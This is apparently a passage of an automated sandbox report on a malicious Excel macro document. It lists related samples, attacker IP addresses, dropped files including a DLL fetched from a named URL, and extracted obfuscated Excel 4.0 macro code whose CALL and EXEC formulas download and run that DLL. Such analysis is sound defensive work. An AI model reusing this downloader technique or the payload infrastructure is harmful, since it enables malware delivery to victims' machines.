              pySsaGoiCT.dllGet hashmaliciousBrowse
              • 162.241.54.59
              QOpv1PykFc.dllGet hashmaliciousBrowse
              • 162.241.54.59
              S4caD0RhXL.dllGet hashmaliciousBrowse
              • 162.241.54.59
              pH8YW11W1x.dllGet hashmaliciousBrowse
              • 162.241.54.59
              7z7Q51Y8Xd.dllGet hashmaliciousBrowse
              • 162.241.54.59
              pySsaGoiCT.dllGet hashmaliciousBrowse
              • 162.241.54.59
              QOpv1PykFc.dllGet hashmaliciousBrowse
              • 162.241.54.59
              S4caD0RhXL.dllGet hashmaliciousBrowse
              • 162.241.54.59
              pH8YW11W1x.dllGet hashmaliciousBrowse
              • 162.241.54.59
              CI-2100403L.exeGet hashmaliciousBrowse
              • 192.254.180.165
              wrtKaH8g28.dllGet hashmaliciousBrowse
              • 162.241.54.59
              Ip6jHpq61F.dllGet hashmaliciousBrowse
              • 162.241.54.59
              PUBLIC-DOMAIN-REGISTRYUSswift Copy.xls.exeGet hashmaliciousBrowse
              • 208.91.199.225
              document-1848152474.xlsmGet hashmaliciousBrowse
              • 199.79.62.99
              FN vw Safety 1 & 2.exeGet hashmaliciousBrowse
              • 208.91.199.223
              MV TBN.uslfze.exeGet hashmaliciousBrowse
              • 208.91.199.224
              purchase order.exeGet hashmaliciousBrowse
              • 208.91.199.223
              AD1-2001028L.exeGet hashmaliciousBrowse
              • 208.91.199.224
              AD1-2001028L (2).exeGet hashmaliciousBrowse
              • 208.91.199.224
              document-1048628209.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1771131239.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1370071295.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-69564892.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1320073816.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-184653858.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1729033050.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1268722929.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-540475316.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1456634656.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-12162673.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-997754822.xlsGet hashmaliciousBrowse
              • 5.100.155.169
              document-1376447212.xlsGet hashmaliciousBrowse
              • 5.100.155.169

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\index[1].htm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:downloaded
              Size (bytes):124025
              Entropy (8bit):5.93057231705895
              Encrypted:false
              SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
              MD5:670BD3713D1FC5F4B0766C4ABADA5CCC
              SHA1:FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771
              SHA-256:AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65
              SHA-512:6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:low
              IE Cache URL:http://bodylanguage.santulan.co.in/ds/index.html
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A7B2AED.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):8854
              Entropy (8bit):7.949751503848125
              Encrypted:false
              SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
              MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
              SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
              SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
              SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6448C247.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):557
              Entropy (8bit):7.343009301479381
              Encrypted:false
              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
              MD5:A516B6CB784827C6BDE58BC9D341C1BD
              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0058FDE.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):8301
              Entropy (8bit):7.970711494690041
              Encrypted:false
              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
              MD5:D8574C9CC4123EF67C8B600850BE52EE
              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E09279C.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):848
              Entropy (8bit):7.595467031611744
              Encrypted:false
              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
              MD5:02DB1068B56D3FD907241C2F3240F849
              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
              C:\Users\user\AppData\Local\Temp\36CE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):96845
              Entropy (8bit):7.870661659091498
              Encrypted:false
              SSDEEP:1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt
              MD5:3479245B9F33A9E1F03900890125DEE3
              SHA1:68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE
              SHA-256:21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C
              SHA-512:8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 00:00:36 2021, atime=Wed Apr 7 00:00:36 2021, length=12288, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.4687971528838295
              Encrypted:false
              SSDEEP:12:85QAvcLgXg/XAlCPCHaXgzB8IB/vyPUAX+Wnicvb8X+bDtZ3YilMMEpxRljKwXcs:85I/XTwz6IgYePDv3qdwrNru/
              MD5:7F920880AA695C9DF2B102FB03974AEF
              SHA1:63965E298D95CCBC4EF5866EA811AAFDB3E7EB22
              SHA-256:E8B89A78169A51E950A368A0BFDC22BFD7E3080CAC8FC79A49ABC22BC5CB17A6
              SHA-512:C02C1BDC2E42B999AC7D4CA46480A10373A9B711B3C75D8C2820D8966E0DB8A48321C869F3D2E659601369C3EF0FF9A37877410AF9AA47F03AA0606FB78CB29A
              Malicious:false
              Preview: L..................F...........7G..|?8kI+..|?8kI+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\374653\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......374653..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-1660683173.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Apr 7 00:00:36 2021, atime=Wed Apr 7 00:00:36 2021, length=96845, window=hide
              Category:dropped
              Size (bytes):2138
              Entropy (8bit):4.528643007870141
              Encrypted:false
              SSDEEP:48:8B/XT3Ik7WZhwIqQh2B/XT3Ik7WZhwIqQ/:8B/XLIk7W4IqQh2B/XLIk7W4IqQ/
              MD5:AC01E803A9FED5CEA946118AD8320EDD
              SHA1:90AF5745FC9946CD42CC1220C057AA9048E49582
              SHA-256:C1581D468241CD0ECEA9A02E5CD3E97C40613BAE7A5AF2DC3634B96F4AE7DC91
              SHA-512:D85F6C3799893ACE3C68564C8CB8E01200D7C28EA518466595A434B5A2CEA6F07DF4BC91802BE0426BC40FE0DB2497BCFFEE156EB87EBD64BA206486B9F6CB6F
              Malicious:false
              Preview: L..................F.... ........{..|?8kI+..^&DkI+..Mz...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.mz...R.. .DOCUME~1.XLS..`.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.s.-.1.6.6.0.6.8.3.1.7.3...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\374653\Users.user\Desktop\documents-1660683173.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.1.6.6.0.6.8.3.1.7.3...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......374653.........
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):115
              Entropy (8bit):4.693504916588958
              Encrypted:false
              SSDEEP:3:oyBVomxWKS9LRmnpzCZELRmnpzCmxWKS9LRmnpzCv:dj49LcBgELcBC9LcBs
              MD5:8380702CB2A3A628F83F6844DDF7E8D9
              SHA1:A7BDA2F60F42F4D202BFEA470BE141F6C2260F8A
              SHA-256:B6F458D5D03DD31FE1299F4B4FEAB548379FB19B473B8CE0613ADE00E73EB421
              SHA-512:0269950A40CD2B18001CC1ACE3EB00731A498B9B11866ECDAA36A9724C7286261BF2782361DD10DE8DEE58E070241B47F835D0DB390C922A7165E97B6DDE8EB5
              Malicious:false
              Preview: Desktop.LNK=0..[misc]..documents-1660683173.LNK=0..documents-1660683173.LNK=0..[misc]..documents-1660683173.LNK=0..
              C:\Users\user\Desktop\07CE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):96845
              Entropy (8bit):7.870661659091498
              Encrypted:false
              SSDEEP:1536:m/JIWQub3DLc6SqhlWxDbl2hawHusD9Byrty30wEGttZv9xEfgJc:GJIW9bTdS7lMHfD9ByrtyOG7ZVxEt
              MD5:3479245B9F33A9E1F03900890125DEE3
              SHA1:68E5533F4FBB045D7D6A84D63DB09ECB7B670CCE
              SHA-256:21715C2FC085ADB028AB1E5A73B0F815B69DB64F7FFABB41242B1C6C3A43C03C
              SHA-512:8E4928A0FBFE36512648002E3E6FE1A52FDEECABE83603DB85FDD5764537B65AE77E43E626F332BB647B13F9CA4B1AFC97B9360492C155946C44BBA35DB9B7D0
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$documents-1660683173.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              C:\Users\user\oeiwkd4.dll
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):124025
              Entropy (8bit):5.93057231705895
              Encrypted:false
              SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
              MD5:670BD3713D1FC5F4B0766C4ABADA5CCC
              SHA1:FF7F7D9AB1494A4BA3EEB4F942E68D69A96F4771
              SHA-256:AF81590CA263392F0124D318604A06785F88696FA623DD16A6C57F6E22A1BD65
              SHA-512:6155E4D073C160CA1DD65590D0BA21E49A999F1E708D0E5BF542776B6F0840CD1991E40BE9D8E56E56224A1576616FAA46680DFE565E054E39E946608ACAC58D
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.882184978149695
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:documents-1660683173.xlsm
              File size:96877
              MD5:cf8cbce9bb25d9081b2da19c6f1c1c70
              SHA1:e014ec63d11a673fd6a655cb20055a723eba2fe5
              SHA256:9a59e089d7b593c0b0651ad43945f19c10c67719b7e01814f4007f253db6e286
              SHA512:6c46ff93eedaff43cd9834602739d961a78f9d55148893d570343b2b9a01b99f6a9fd7df3f7ede0a954300f5372d89caf5129aea6f60c87ab3cf212fa631b705
              SSDEEP:1536:491M4Kfra8zxQz8jbztonsBjFC6QomaIRUxPLe96bGAfe2hawno:491M4kra8Wz8jbzSn4BC6Qdkx60WMo
              File Content Preview:PK..........!...`.............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "documents-1660683173.xlsm"

              Indicators

              Has Summary Info:
              Application Name:
              Encrypted Document:
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:

              Macro 4.0 Code

              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\oeiwkd""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM23,before.2.0.0.sheet!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUM